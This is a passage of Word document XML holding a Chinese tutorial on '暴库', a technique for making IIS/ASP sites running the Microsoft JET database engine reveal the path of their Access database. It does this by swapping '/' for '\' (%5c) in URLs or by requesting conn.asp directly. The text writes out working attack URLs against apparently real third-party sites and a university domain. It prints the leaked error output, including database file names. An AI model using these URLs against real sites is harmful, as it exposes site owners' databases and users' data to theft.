        <w:t>表示虚拟路径，这可能就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>会自动把我们地址中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>转为</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>的原因。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="00300B49">
        <w:t xml:space="preserve">　　明白这些，我们再来理解暴库就不难了，当我们提交：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>http://219.237.81.46/yddown\view.asp?id=3</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>View.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>后，得到的网页相对路径是这样的：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“/yddown\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，再加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“admin/rds_dbd32rfd213fg.mdb”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，就得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“/yddown\</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>＋</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>admin/rds_dbd32rfd213fg.mdb”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>代表着不同的意义，遇到了</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>时，认为它已到了根目录所在的物理路径，不再往上解析（</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7AC7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>为何不再往上解析？后面还会分析</w:t>
      </w:r>
      <w:r w:rsidR="00F647C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此处向上解析，实际意思是</w:t>
      </w:r>
      <w:r w:rsidR="00F647C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00F647C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自右向左解析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>），于是网站的完整相对路径变成了：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:lastRenderedPageBreak/>
        <w:t>“admin/rds_dbd32rfd213fg.mdb”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，再加上根目录的物理路径，得到的真实路径变成：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“D:\111\admin\rds_dbd32rfd213fg.mdb”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，而这个路径是不存在的，数据库连接当然会失败，于是</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>会报错，并给出错误原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t xml:space="preserve">Microsoft JET Database Engine </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t xml:space="preserve"> '80004005' </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>'D:\111\admin\rds_dbd32rfd213fg.mdb'</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>不是一个有效的路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>/yddown/conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，行</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>12 </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>这就是暴库方法的来历。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="001D5DA5">
        <w:t xml:space="preserve">　《再谈</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>暴库的利用》一文中说，必须是网址中的第二级目录才可以成功，第一个不行。我们从理论上来分析一下，看到底有无规律。还以上面网址为例，如果将第一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>换成</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>，得到的网站相对路径变成</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>“\yddows/admin/rds_dbd32rfd213fg.mdb”</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>，解析到</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>时，认为已到物理目录，不再</w:t>
      </w:r>
      <w:r w:rsidRPr="001137D7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>往前解析</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>。而事实上，它确实也是根目录，所以得到的物理路径为：</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>“D:\111\dydow\admin\rds_dbd32rfd213fg.mdb”</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t>，这个路径是正确的，所以不会出错，当然不会暴出数据库路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5DA5">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="00BE647C">
        <w:t>第二个</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>换成</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>的情况，我们上面已作分析，那是不是真的就是二级页面才可以暴出呢？事实上，只是因为二级页面较为常见，并不是真理。如果这个下载系统是某一个网站中的三级目录，那第三个</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>成功的可能性更大。也就是说，最右边第一个成功可能性大！</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>我先举个例子，再说原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>http://nice.xmu.edu.cn/channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>blog/showlog.asp?cat_id=31&amp;log_id=246 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>这个网址变第二个</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>时，网站打开很慢，但没有出错。当我们把第三个</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>变成</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>后，提交：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
        <w:t>http://nice.xmu.edu.cn/channely/blog\showlog.asp?cat_id=31&amp;log_id=246 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>数据库暴出来了：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
        <w:t xml:space="preserve">Microsoft JET Database Engine </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t xml:space="preserve"> '80004005' </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
        <w:t>'H:\channely\log_mdb\)dlog_mdb).asp'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>不是一个有效的路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
        <w:t>/channely/blog/conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>，行</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>18 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>为何这样？这是因为网站用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00053B40">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>虚拟目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3302635"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="11" name="图片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876675"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="19" name="图片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746375"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="21" name="图片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A5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5"/>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="00BE647C">
        <w:t>也就是说这个网站的子目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>Channely</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>并不在网站根目录内。设置过</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t>的人会知道，可以将网站目录外的一个真实物理目录设置为网站的虚拟目录。也就是说，网站的相对对径并不总是从根目录算起，很可能在某个子目录就指向了物理目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE647C">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5868" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="0029155B">
        <w:t>上面的结果很显然，</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Channely</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>已位于</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>：盘的根目录上，上面再没有目录。事实上，很可能网站在</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>：盘或</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>：盘，而通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Channely</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>虚拟子目录指向网站根目录以外的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“H:\channely\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009470B6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>这里，我们可以更清楚的看到，微软</w:t>
      </w:r>
      <w:r w:rsidRPr="009470B6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="009470B6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>为何没有到根目录，只要遇上</w:t>
      </w:r>
      <w:r w:rsidRPr="009470B6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="009470B6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>就认为已到物理绝对路径，不再往上解析的原因，就是为了处理这种网站虚拟目录与根目录不在一起的情况。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB74C9">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>它优先查询每个目录是否指向了物理路径，如果指向了，则把它换成绝对路径，而它上面的相对地址不再解析转换</w:t>
      </w:r>
      <w:r w:rsidR="00BD5868">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00BD5868">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处</w:t>
      </w:r>
      <w:r w:rsidR="00DC110A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的相对地址</w:t>
      </w:r>
      <w:r w:rsidR="00BD5868">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，实际意思是</w:t>
      </w:r>
      <w:r w:rsidR="00BD5868">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00BD5868">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自右向左解析。</w:t>
      </w:r>
      <w:r w:rsidR="00BD5868">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB74C9">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072854" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="0029155B">
        <w:t>从以上分析可知，我们只有在数据库相对地址和它的目录绝对地址之间使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>％５ｃ</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>）才能达到目的。上例中，如果在第二处使用，它只会影响到</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>寻找虚拟的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Channely</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>目录地址，而</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>中解析出的数据库地</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“H:\channely\blog\log_mdb\)dlog_mdb).asp”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>仍是对的。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>《再谈</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>暴库的利用》中还说了一种针对只有一级目录的解决方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>其实一级目录我们也同样可以成功的，我们可以通过构造一个多级目录来达到暴库的目的。如：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>http://www.target.com/noexists/..\list.asp?id=1 </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>这样大家就会有新的惊喜了，呵呵。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>真的吗？从理论上分析，这种方法是不会成功的。因为遇到</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>时，页面不再解析，所以中间构造的目录不论是真是假，都是不起作用而被舍弃了，相对路径还是到了根目录，路径不会出错。为了证明，我特意找了一个例子：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>http://www.om88.com/Article_Show.asp?ArticleID=481 </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>这个网站我们先用</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>方法暴出数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>后面将讲解这个方法），说明服务器和网站设置是可以暴库的。提交：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>http://www.om88.com/inc/conn.asp </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>可以看到是可以暴库的，我们再提交：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>http://www.om88.com/abc/..\Article_Show.asp?ArticleID=481 </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>却暴不出库，仍得到正常页面（换成存在的路径结果也一样），但图片无法显示。这是因为相对路径变了，所以无法正确找到图片路径，但绝对路径解析时被</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>舍弃了，没有出错，当然暴不出库了。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:lastRenderedPageBreak/>
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>暴库大法</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>这里的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>只是表示数据库调用文件，因为多数都是这个名字（有些网站改名，我们也视同</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>）。其实，这种暴库法是最先出现的，以前很多牛人都对此进行过探讨，我记得黑防也在特别早的时候专门讨论了这个方法。只是在</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>暴库大法出现后，倒较少有人提及。其实个人认为，</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>暴大法随着服务器设置安全性的加强，用武之地会越来越少。而</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>暴库大法发挥的余地更大，可以人为构造，臭要饭的当年著名的动网大挪移实现暴库，其实也属于此类。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>在上面</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>http://www.om88.com/</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>的一例中，用</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>暴不出数据库路径，因为没有二级目录，但用第二种却可以暴出，它是动力系统的。我们再来看另外一个盗帅的例子：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>http://www.51see.org/ </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>提交：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>http://www.51see.org/db/user.asp </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>得到如下结果：。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t xml:space="preserve">“Microsoft JET Database Engine </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t xml:space="preserve"> '80004005' </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>'d:\Hosting\wwwroot\uilady_com\htdocs\db\db\downloadwoaini12345.asp'</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>不是一个有效的路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>/db/user.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>，行</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>6 ” </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>有人可能会说，这么简单就暴库，好爽！是不是所有网站都可以这样啊？当然不是，已作了防护的站点肯定不行，没作防护的，要暴库也是有条件的。如果说第一种暴库法是利用了绝对路径出错，那么，这种暴库法就是利用了相对路径出错。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>一般来说，只要</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>不在根目录的系统，而调用文件在根目录，就会出现这种问题。当然这种说法也是经验性的，准确的说就是，</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0161">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00072854">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00072854">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>与调用它的文件如果相对位置改变了，就会报错，暴出数据库路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>这样说可能有人不明白，不要紧，接着看你就会明白的。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>我们从动力文章系统说起。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
